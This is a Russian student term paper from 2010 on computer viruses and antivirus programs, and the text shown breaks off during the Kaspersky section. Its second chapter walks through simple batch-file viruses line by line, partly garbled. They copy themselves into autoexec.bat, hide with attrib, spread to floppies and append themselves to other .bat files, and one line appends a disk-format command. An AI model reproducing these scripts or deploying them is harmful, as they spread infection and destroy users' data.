Современные вирусы и борьба с ними



 

 

МИНИСТЕРСТВО ОБРАЗОВАНИЯ РОССИЙСКОЙ ФЕДЕРАЦИИ

 

Московский Государственный институт электроники и математики

(Технический университет)

Кафедра информационно - коммуникационных технологий

 

 

 

КУРСОВАЯ РАБОТА НА ТЕМУ:

«Современные вирусы и борьба с ними»

ПО ДИСЦИПЛИНЕ "ОРГАНИЗАЦИЯ ЭВМ "

 

 

 

ВЫПОЛНИЛ:

СТУДЕНТ ГРУППЫ С-34

Таранов Игорь Юрьевич

 

 

ПРЕПОДАВАТЕЛЬ: доцент

Мартиросян Сашик Торгомович

 

Москва, 2010г.


Введение.

В наши дни трудно найти человека, знакомого с персональным компьютером и ни разу не столкнувшегося с компьютерными вирусами. Они преследуют его повсюду: в интернете, на различных носителях информации (флешки, CD,DVD диски), в локальной сети. В моем курсовом проекте я решил познакомить читателя с компьютерными вирусами, привести пример написания вируса без использования каких-либо специальных программ, рассказать об антивирусных программах и помочь ему выбрать наиболее подходящий антивирус из наиболее популярных на данный момент программ такого рода(Dr.Web, Kaspersky Internet Security, AVZ, Nod32).

 

 

 

 

 

 

 

 

 

Постановка задачи.

1)Привести общие факты о вирусах (история возникновения, формулировка определения, какие программы считаются вирусами, типы современных вирусов, факты о наиболее "нашумевших" вирусах).
2)Привести пример простейших вирусов, которые можно сделать "на колене" без каких-либо специальных программ и утилит (простейшие вирусы можно сделать даже в блокноте).
3)Дать характеристику современных антивирусных программ: познакомить читателя с разновидностями современных антивирусов, раскрыть принцип работы этих программ.

4)Знакомство с наиболее популярными современными антивирусами: Nod32, Dr.Web, Kaspersky Internet Security, AVZ.
5)Проверка нескольких современных антивирусных программ на эффективность поиска зараженных файлов, сравнение их работы и выявление таким образом наиболее "привлекательного" антивируса.

 


Часть 1.

Знакомство с вирусами.

Начну я свою курсовую работу, посвященную компьютерным вирусам, с того, что дам определение того, что же называется компьютерным вирусом. Существует множество определений этих программ. Например, на www.microsoft.com дано следующее определение: «Компьютерные вирусы — это небольшие программы, которые распространяются с компьютера на компьютер и вмешиваются в работу операционной системы». Попытки дать определение этим программам заводят исследователей компьютерных вирусов вплоть до того, что они (исследователи) приходят к выводу, что дать формальное определение компьютерного вируса невозможно по той причине, что на данный момент эти программы слишком многообразны, и в результате определение получится либо слишком общим, либо просто начнется перечисление известных компьютерных вирусов. Поэтому в данный момент наиболее целесообразным я нахожу как раз перечислить свойства современных компьютерных вирусов. Прежде всего, вирус – это программа. Достаточно очевидное свойство, которое, развеивает множество легенд о компьютерных вирусах. Вирус может перевернуть изображение на вашем мониторе, но не может перевернуть сам монитор. К легендам о вирусах-убийцах, «уничтожающих операторов посредством вывода на экран смертельной цветовой  гаммы 25-м кадром» также не стоит относиться серьезно. К сожалению, некоторые авторитетные издания время от времени публикуют «самые свежие новости с компьютерных фронтов», которые при ближайшем  рассмотрении оказываются следствием не вполне ясного понимания предмета. Вирус - программа, обладающая способностью к самовоспроизведению. Эта особенность присуща всем типам вирусов. Вирус не может существовать в «полной изоляции»: все вирусы так или иначе взаимодействуют с программным обеспечением компьютера и в какой-то меру корректируют нормальную работу компьютера.

Теперь поговорим о классификации вирусов. Итак, классифицировать вирусы я нашел наиболее наглядным и удобным виде таблицы с последующим более детальным рассмотрением ее частей (информация получена с www.hackzone.ru ,их классификацию вирусов я счел наиболее прижившейся в рунете и потому решил в своей работе привести еменно её) :

Файловые вирусы либо различными способами внедряются в выполняемые файлы (наиболее распространенный тип вирусов), либо создают файлы-двойники (компаньон-вирусы), либо используют особенности организации файловой системы (link-вирусы).
 

Загрузочные вирусы записывают себя либо в загрузочный сектор диска (boot-сектор), либо в сектор, содержащий системный загрузчик винчестера (Master Boot Record), либо меняют указатель на активный boot-сектор.
Макро-вирусы заражают файлы-документы и электронные таблицы нескольких популярных редакторов.
Сетевые вирусы используют для своего распространения протоколы или команды компьютерных сетей и электронной почты.                                                                        Заражаемая ОС является еще одним рубежом, на котором происходит деление вирусов. Каждый файловый или сетевой вирус заражает файлы какой-либо определенной операционной системы ( также встречаются вирусы, способные заразить файлы сразу нескольких ОС). Макро вирусы заражают файлы Word, Exel, Microsoft Office.        

Среди особенностей алгоритма выделяют следующие пункты:

-Резидентность. Резидентный вирус при инфицировании компьютера оставляет в оперативной памяти свою резидентную часть, которая затем перехватывает обращения операционной системы к объектам заражения и внедряется в них. Резидентные вирусы находятся в памяти и являются активными вплоть до выключения компьютера или перезагрузки операционной системы. Нерезидентные вирусы не заражают память компьютера и сохраняют активность ограниченное время. Некоторые вирусы оставляют в оперативной памяти небольшие резидентные программы, которые не распространяют вирус. Такие вирусы считаются нерезидентными. Также резидентными можно считать макро вирусы так как они присутствуют в памяти компьютера в течение всего времени работы вашего редактора.                                                                                                                                           

- Использование стелс алгоритмов- позволяет вирусам незаметно присутствовать в памяти компьютера. Наиболее общим в их работе является то, что они заражают файл, а при обращении ОС к этому файлу временно его лечат, подставляя вместо себя фрагменты незараженной информации, тем самым уменьшая риск собственного обнаружения и ликвидации. Наиболее прославившимися вирусами такого типа были вирус «Frodo» и первый известный загрузочный стелс вирус «Brain».

- Самошифрование и полиморфичность – присущи большинству современных вирусов. Благодаря этим свойствам вирусы затрудняют процесс детектирования. Такие вирусы не имеют постоянных участков кода и два образца одного и того же polymorphic вируса не будут содержать ни одного совпадения. Это достигается шифрованием основного тела вируса и модификациями программы-расшифровщика.

 

 

 

 

Часть 2.

Написание простейших вирусов.

Начать вторую часть моего курсового проэкта хотелось бы прежде всего с упоминания о статье 273: «Создание, использование и распространение вредоносных программ для ЭВМ» и далее осветить пункты этой статьи (раз уж курсовой проэкт посвящен вирусам, то, думаю, данная информация будет далеко не лишней). Итак, перейдем, собственно, к пунктам

1.Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.

2.Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет.

Как думаю, читатель моего курсового проекта уже понял, наказания весьма серьезные, но, как известно, на данный момент интернет, скорее всего по причине практически полного отсутствия контроля большинства ресурсов на подобные казусы карательными органами, а, может, просто по причине банальной выгоды слишком большому количеству людей от подобного рода программ, все еще кишит самыми разнообразными вирусами.

Теперь, познакомившись, с тем, что, собственно, грозит разработчикам вирусных программ, самое время, перейти к написанию собственных простейших вирусов, которые, несомненно, не будут опасными, по той причине, что сейчас все антивирусные программы (о них мы поговорим в следующих главах) обладают технологией распознавания неизвестных вирусов. Как я обещал в начале, никаких специальных хакерских программ и утилит нам для этого не понадобится- мы воспользуемся стандартным блокнотом. По мере написания я буду комментировать, что, собственно мы пишем. Итак, собственно, для начала, перейдем к тому, что вирусом пока что назвать нельзя, зато с легкостью можно назвать основой любого вируса.

 

@Echo off – Запрещаем вывод на экран исполняемых команд.

copy %0 c:virus.bat >nul - копируем файл; запрещаем вывод на экран самой команды и результата её действия

echo c:virus.bat>>c:autoexec.bat - добавляем текст в уже существующий файл

 

Вот и готово. Выше вы увидели основу для одного из простейших bat-вирусов. Дальше мы дадим нашему вирусу новую способность – умение заражать другие компьютеры через дискету.

 

@Echo off copy %0 c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul - копируем этот файл на дискету, если таковая имеется в дисководе (копирование произойдет при перезагрузке компьютера)

@Echo off copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul -устанавливаем файлу virus.bat атрибут «скрытый»- echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul .

@Echo off if exist c:virus.bat goto ski -проверяем, существует ли файл-. copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :ski – если он существует, то программа переходит на метку ski. copy %0 a:run.bat >nul.

Таким образом, мы добавили еще одну интересную команду – if exist, благодаря которой вирус будет сам проверять, есть ли в наличии файл c:virus.bat и если он есть, то, не выполняя лишних действий, он (вирус) просто скопирует себя на дискету. Теперь же перейдем к финальной модернизации нашего вируса.

@echo off%[Meteor]% - выводим на экран текст Meteor.

if '%1=='In_ goto Meteo - если переменная %1 равна In, то переходим к метке «:Meteo»

if exist c:Meteor.bat goto Mete - проверяем, существует ли файл Meteor.bat, если да, то переходим к метке «:Mete»

if not exist %0 goto Met - если файл не существует, то переходим к метке «Met»

find "Meteor"c:Meteor.bat - проверяем, есть ли файл meteor на диске, если нет, то копируем его туда

attrib +h c:Meteor.bat - делаем файл скрытым.

:Mete – метка

for %%t in (*.bat) do call c:Meteor In_ %%t - выполняем одну команду (call - позволяет вызвать один пакетный файл из другого) для нескольких параметров- т.е. вирус находит файл с расширением .bat, и заражает его с помощью команды type, дописывая себя к найденному .bat-файлу.

goto Met – перейти к метке.

:Meteo – метка.

find "Meteor"nul - указываем файлу значение 2 и запрещаем вывод команды и ее результата на экран.

if not errorlevel 1 goto Met - если не произошло ошибки (с кодом 1) выполнения предыдущей команды, то переходим на метку.

type c:Meteor.bat>>%2 -дописываем «себя» к найденному .bat-файлу.

:Met – метка.

Готово. Для того, чтобы вышенаписанное стало вирусом, сохраняем его с разрешением .bat. Получаем пакетный файл MS-DOS. Для удобства восприятия далее выложу текст вируса без комментариев.

@Echo off

copy %0 c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat

@Echo off copy %0 c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul

@Echo off copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul

echo c:virus.bat>>c:autoexec.bat copy %0 a:run.bat >nul

@Echo off if exist c:virus.bat goto ski

copy %0 c:virus.bat

>nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :ski

. copy %0 a:run.bat >nul

@echo off%[Meteor]%

if '%1=='In_ goto Meteo

if exist c:Meteor.bat goto Mete

if not exist %0 goto Met

attrib +h c:Meteor.bat

:Mete

for %%t in (*.bat) do call c:Meteor In_ %%t

goto Met

:Meteo

find "Meteor"nul

if not errorlevel 1 goto Met

type c:Meteor.bat>>%2

:Met

Ну и в заключение второй главы приведу еще 1 короткий, но весьма интересный пример.

@Echo off Echo format C: /q >> c:Autoexec.bat

Этот вирус добавляет autoexec.bat  строку format C:\q и при перезагрузке компьютера происходит быстрое форматирование.

 

 

Итак, познакомившись во второй главе нашего курсового проекта с написанием простейших вирусов и тем самым несколько рассеяв плотную «завесу магии», наблюдаемую для подавляющего большинства современных пользователей ЭВМ вокруг программ такого рода, думаю, самое время перейти главе 3 и антивирусным программам.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Глава 3.

Знакомство с антивирусами.

 

Начну я третью главу моего курсового проекта с определения антивируса. Есть несколько определений для этих программ, начиная от самого лаконичного: «Антивирус — программное средство, предназначенное для борьбы с вирусами ,» - и заканчивая более емким и развернутым (предствалено на Wikipedia.org): «Антивирус – это программа для обнаружения компьютерных вирусов а также нежелательных программ и вообще восстановления зараженных такими программами файлов а также для профилактики – предотвращения заражения файлов и ОС вредоносным кодом.» Далее представлены (как и в случае с вирусами) типы антивирусов в виде наглядной схемы.

Антивирусы типа сканер появились самыми первыми – практически в одно и тоже время с появлением первых вирусов. Принцип их работы заключается в поиске вирусных масок в файлах, памяти и загрузочных секторах диска. Вирусные маски (описания) известных вирусов  содержатся в антивирусной базе данных и если сканер встречает код, совпадающий с одним из этих описаний, он выдает сообщение об обнаружении вируса.

Недостатки сканера:

1)      Малейшие модификации вируса могут сделать его невидимым для сканера: программный код не будет полностью совпадать с описанием в базе данных что влечет за собой проблемы с обнаружением полиморфных вирусов.

2)      Время между появлением вируса и выходом соответствующего обновления пользователь остается практически незащищенным от атак новых вирусов. К счастью, сейчас вирусные базы обновляются очень часто, но, надо отметить, вирусы тоже не стоят на месте.

3)      Антивирусный сканер проверяет файлы, только когда пользователь “попросит” его это сделать, т.е. запустит программу, что влечет за собой не только неудобства для пользователя, требуя от него постоянного внимания и концентрации, в результате чего ( в случае невнимательного и несконцентрированного пользователя) заражение обнаруживается постфактум либо не обнаруживается вовсе если пользователь забыл сделать проверку.

4)      Большой размер вследствие необходимости таскать за собой антивируную базу данных, требовательность к системным ресурсам и небольшая скорость поиска вирусов.

Но, тем не менее, не стоит забывать и о важном достоинстве такого типа антивирусов: они способны блокировать распространение Internet-червей, эффективно удалять вирусы из зараженных файлов и загрузочных секторов диска и восстанавливать их работоспособность.

Антивирусы типа монитор по сути являются разновидностью сканеров, которые постоянно присутствуют в памяти компьютера и осуществляют проверку всех используемых файлов в режиме реального времени. На данный момент существует 3 разновидности таких антивирусов:

1)      Файловые мониторы.

2)      Мониторы для специальных приложений.

3)      Мониторы для почтовых программ.

Благодаря фоновому режиму работы антивирусные мониторы позволяют пользователю не обременять себя заботой о ручном сканировании каждого нового файла: антивирусная проверка будет осуществлена автоматически. В случае обнаружения вредоносной программы, монитор, в зависимости от настроек, вылечит файл, заблокирует его выполнение или изолирует, переместив в специальную карантинную директорию для дальнейшего исследования.

Файловые мониторы являются наиболее распространенными среди антивирусов данного типа. Они работают как часть ОС, в режиме реального времени проверяя все находящиеся в компьютере объекты, не зависимо от их принадлежности какому-либо приложению.

Мониторы для почтовых программ представляют собой антивирусные модули, интегрирующиеся в программы обработки электронной почты – как серверные, так и клиентские. По сути дела, они становятся неотъемлемой частью программы и при поступлении нового письма автоматически проверяют его. В отличие от файловых мониторов они требуют меньше системных ресурсов и гораздо более устойчивы, так как возможность системного конфликта на уровне приложения существенно меньше, нежели на уровне операционной системы. В дополнение к этому "почтовые" мониторы проверяют все входящие и исходящие сообщения сразу же после их получения или отправления.

Мониторы для специальных приложений также обеспечивают фоновую проверку объектов, но только в рамках приложения, для которого они предназначены. Наглядным примером могут быть антивирусные мониторы для MS Office.

Третья разновидность антивирусов – ревизоры изменений (integrity checkers). Эта технология защиты основана на том факте, что вирусы являются обычными компьютерными программами, имеющими способность тайно создавать новые или внедряться в уже существующие объекты (файлы, загрузочные секторы). Иными словами, они оставляют следы в файловой системе, которые затем можно отследить и выявить факт присутствия вредоносной программы.

Достоинства ревизоров изменений:

1)      Исключительно высокая скорость работы.

2)      Низкие требования к аппаратной части компьютера.

3)      Высокий процент восстановления файлов и загрузочных секторов, поврежденных вирусами, в том числе неизвестными.

4)      Ревизоры не требуют громоздкой антивирусной базы данных, довольствуясь лишь описаниями способов внедрения вирусов, которые занимают, в зависимости от продукта, всего от 300 до 500 килобайт. Зная эти способы, программа может быстро и эффективно удалить вирус вне зависимости от того, где находится его код: в начале, середине, конце или же вообще разбросан в виде небольших кусков по всему зараженному объекту.

Недостатки ревизоров изменений:             

1)      Неспособность поймать вирус в момент его появления в системе.

2)      Неспособность определить вирус в новых файлах.

3)      Необходимость в наличии регулярного запуска.

Антивирусы типа иммунизаторы делятся на 2 вида: иммунизаторы, сообщающие о заражении, и иммунизаторы, блокирующие заражение каким-либо типом вируса. Первые обычно записываются в конец файла и каждый раз проверяют его на изменения. Недостаток у этого антивируса всего один, но очень важный: полная неспособность работы со stealth вирусами. Второй тип иммунизаторов защищает систему от поражения каким-либо определенным вирусом. Файлы модифицируются таким образом, что вирус принимает их за уже зараженные.

Так или иначе, все вышеперечисленные типы антивирусов имеют один огромный недостаток: они неспособны противостоять неизвестным вирусам. Порой за то время, пока даже продвинутые антивирусные компании смогут найти «противоядие» от какого-либо серьезного вируса, компании по всему миру имеют реальную возможность заразиться этим самым вирусом и понести убытки. По моим прогнозам, будущее антивирусных программ – за поведенчискими блокираторами. Именно они имеют реальную возможность со 100% гарантией противостоять атакам новых вирусов. Поведенческий блокиратор это резидентная программа, которая перехватывает различные события и в случае "подозрительных" действий запрещает это действие или запрашивает разрешение у пользователя. Иными словами, блокиратор совершает не поиск уникального программного кода вируса (как это делают сканеры и мониторы), не сравнивает файлы с их оригиналами (наподобие ревизоров изменений), а отслеживает и нейтрализует вредоносные программы по их характерным действиям. Идея блокираторов не нова. Она появилась достаточно давно но не получила широкого распространения из-за сложности настройки и требования от пользователя глубоких знаний в области компьютеров. Но, учитывая последние достижения в области искусственного интеллекта, эти недостатки могут сойти на нет.

Итак, ознакомившись с общими сведениями об антивирусах, самое время перейти к главе 4 и знакомству с NOD32, Dr. Web, Kaspersky Internet Security и набирающим популярность AVZ .


Глава 4.

4.1 Антивирус NOD32

 

NOD32 - антивирусный пакет, выпускаемый фирмой Eset. Возник в конце 1998 года. Название изначально расшифровывалось как Nemocnica na Okraji Disku ("Больница на краю диска").

NOD32 - это комплексное антивирусное решение для защиты в реальном времени от широкого круга угроз. Eset NOD32 обеспечивает защиту от вирусов, а также от других угроз, включая троянские программы, черви, spyware, adware, phishing-атаки. В решении Eset NOD32 используется патентованная технология ThreatSense®. Эта технология предназначена для выявления новых возникающих угроз в реальном времени путем анализа выполняемых программ на наличие вредоносного кода, что позволяет предупреждать действия авторов вредоносных программ.

Наравне с базами вирусов NOD32 использует эвристические методы. Считается, что среди других ведущих антивирусных пакетов NOD32 отличается малым использованием системных ресурсов.

4.1.1 Основные плюсы

Дружественный интерфейс Интерфейс программы лёгок и интуитивно понятен, настройка не вызывает проблем.

Высокая производительность Эффективное обнаружение вредоносных программ не обязательно должно замедлять работу компьютера. NOD32 по большей части написан на языке ассемблера и неоднократно выигрывал награды за высочайшую производительность среди антивирусных приложений. NOD32 в среднем в 2-5 раз быстрее, чем его конкуренты (источник: Virus Bulletin).

Малое влияние на системные ресурсы NOD32 экономит ресурсы жесткого диска и оперативной памяти, оставляя их для критических приложений. Установщик занимает всего 8,6 Мбайт, а приложению требуется менее 20 Мбайт оперативной памяти (это значение может варьироваться с изменением технологии обнаружения). Обновления технологии ThreatSense, включающие записи эвристической логики и вирусные сигнатуры, обычно имеют объем 20-50 Кбайт.

Простота управления Обновления программы и вирусной базы данных выполняются автоматически в фоновом режиме. Если NOD32 используется на личном или домашнем компьютере, можно просто включить функцию автоматического обновления и больше никогда об этом не вспоминать. Предприятия и организации с крупными распределенными сетями могут использовать мощный компонент удаленного администрирования (Remote Administrator), позволяющий разворачивать, устанавливать, наблюдать и контролировать тысячи рабочих станций и серверов NOD32.

 

4.1.2 Модули и компоненты

 

Antivirus MONitor (AMON) On-access (резидентный) сканер, который автоматически проверяет файлы перед осуществлением доступа к ним.

NOD32 "On-demand" сканер, который можно запустить вручную для проверки отдельных файлов или сегментов диска. Этот модуль можно также запрограммировать на запуск в часы с наименьшей загрузкой.

Internet MONitor (IMON) Резидентный сканер, работающий на уровне Winsock и препятствующий попаданию зараженных файлов на диски компьютера. Данный модуль проверяет Интернет-трафик (HTTP) и входящую почту, полученную по протоколу POP3.

E-mail MONitor (EMON) Дополнительный модуль для проверки входящих/исходящих сообщений через интерфейс MAPI, например, в Microsoft Outlook и Microsoft Exchange.

Document MONitor (DMON) Использует запатентованный интерфейс Microsoft API для проверки документов Microsoft Office (включая Internet Explorer).

 

 

4.3 Антивирус Dr. WEB

 

Программа Dr. Web относится к классу антивирусных программных средств, называемых полифагами. Она предназначена для поиска и обезвреживания файловых, загрузочных и файлово-загрузочных вирусов. Cущественной особенностью Dr. Web, которая выделяет его среди других программ-полифагов, является использование оригинального эвристического анализатора наряду с традиционным методом обнаружения вирусов по их сигнатурам (определенной последовательности байтов в теле программы, которая однозначно идентифицирует конкретный вирус). Большинство существующих в настоящее время программ-полифагов используют только метод обнаружения вирусов по сигнатурам.

Тем самым возможности таких программ по обнаружению вирусов ограничены строго определенным набором, который известен автору программы. Использование эвристического анализатора позволяет выявлять также вирусы, сигнатура которых неизвестна автору программы. Алгоритмы, используемые в Dr. Web позволяют выявлять все известные в настоящее время типы вирусов.

Программы семейства Dr. WEB выполняют поиск и удаление известных им вирусов из памяти и с дисков компьютера, а также осуществляют эвристический анализ файлов и системных областей дисков компьютера. Эвристический анализ позволяет с высокой степенью вероятности обнаруживать новые, ранее неизвестные, компьютерные вирусы.

В 1999 году появилось новое поколение 32-битных антивирусных программ (DrWeb32). Оно включает в себя набор программ для Windows 95-XP, DOS/386, OS/2 и Novell NetWare, к которым несколько позже присоединились программы для Linux, FreeBSD и Solaris x86.

В комплект программ для Windows 95-XP входит полифаг Dr. WEB и резидентный сторож SpIDer Guard. Программа-полифаг обнаруживает и удаляет фиксированный набор известных вирусов в памяти, файлах и системных областях дисков компьютера.

Резидентный сторож (называемый также монитором), находясь в памяти компьютера, постоянно контролирует вирусоподобные ситуации, производимые различными программами с диском и памятью.

Начиная с версии 4.20, в комплект программ для Windows входит Планировщик Dr. WEB, позволяющий производить запуск антивирусных программ и проверку устройств хранения информации, а также осуществлять обновление вирусных баз и компонентов программы по графику, задаваемому пользователем.

Антивирусные программы семейства Dr. WEB для DOS, DOS/386, OS2 и Novell NetWare являются полифагами. В составе программ для Linux и FreeBSD присутствуют как полифаги, так и демоны. (Демон DrWebD может использоваться практически в любых схемах обработки данных в качестве подключаемого внешнего антивирусного фильтра. Например, почтовые системы (такие как sendmail, qmail и др.) могут быть достаточно легко и гибко настроены на использование демона DrWebD для проверки проходящих через почтовый сервер сообщений e-mail).

Программа представляет собой классический полифаг и предназначена для использования в 32-битных операционных системах семейства Windows (т.е. Windows 95/98/2000/ME/XP, а также Windows NT 4.0 и выше). Программа производит сканирование файлов и системных областей дисков компьютера на наличие в них компьютерных вирусов и, при нахождении последних, производит их лечение. Кроме того в составе программы имеется эвристический анализатор, позволяющий находить новые, неизвестные вирусы.

Dr. WEB для Windows выпущена в двух вариантах: с графическим интерфейсом (DrWeb32w) и без него (DrWebwcl). Оба варианта поддерживают одинаковый набор параметров (ключей) командной строки. Но для варианта с графическим интерфейсом все настройки могут производиться из диалоговых панелей. Вариант без графического интерфейса требует несколько меньших ресурсов.

Оба варианта программы используют один и тот же конфигурационный файл и одну и ту же группу настроек в этом файле, что дает возможность попеременного использования данных программ с настройкой требуемых режимов наиболее удобным способом.

 

 

4.4 Антивирус Kaspersky Internet Security

 

Защита Kaspersky Internet Security строится исходя из источников угроз, то есть на каждый источник предусмотрен отдельный компонент приложения, обеспечивающий его контроль и необходимые мероприятия по предотвращению вредоносного воздействия этого источника на данные пользователя. Такое построение системы защиты позволяет гибко настраивать приложение под нужды конкретного пользователя или предприятия в целом.

Kaspersky Internet Security включает:

Компоненты защиты, обеспечивающие защиту вашего компьютера на всех каналах поступления и передачи информации.

Задачи поиска вирусов, посредством которых выполняется проверка компьютера или отдельных файлов, каталогов, дисков или областей, на присутствие вирусов.

Сервисные функции, обеспечивающие информационную поддержку в работе с приложением и позволяющие расширить ее функциональность.

 

 

1.4.1 Компоненты защиты

 

Защита вашего компьютера в реальном времени обеспечивается следующими компонентами защиты:

Файловый Антивирус.

Файловая система может содержать вирусы и другие опасные программы. Вредоносные программы могут годами храниться в вашей файловой системе, проникнув однажды со съемного диска или из интернета, и никак не проявлять себя. Однако стоит только открыть зараженный файл, вирус тут же проявит себя.